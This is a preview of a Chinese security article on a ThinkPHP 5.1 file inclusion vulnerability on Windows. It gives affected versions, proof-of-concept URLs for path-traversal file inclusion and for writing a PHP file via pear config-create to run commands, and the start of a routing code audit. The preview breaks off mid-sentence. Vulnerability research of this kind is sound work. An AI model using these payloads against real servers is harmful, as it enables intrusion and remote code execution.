文章预览
声明 :请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 Thinkphp5.1.0-Thinkphp5.1.*文件包含漏洞 (CNVD-2024-29981)
time 4.24 测试版本:thinkphp 5.1.41 php: 7.3.4 影响范围:thinkphp5.1.0--thinkphp5.1.* (windows): linux无法利用 漏洞利用poc: index.php?s=..\..\你要包含的路径/index/index pear进行命令执行poc : /index.php?s=..\..\..\Extensions\php\php7.3.4nts\pear\ & +config-create+/+1.php 调用堆栈: 一.Thinkphp文件包含:
在Thinkphp5中路由可以使用一下两种方式都可以访问到执行的方法中如: http://127.0.0.1/index.php/index/index/hello http://127.0.0.1/index.php?s=index/index/hello 简单一点来说其实就是对应的 模块 /控制器/方法 1.1: Thinkphp5.1.41审计过程
首先需要触发路由 http://127.0.0.1/index.php?s=index/index/hello 进入run方法, 走到405行routeCheck方法,根
………………………………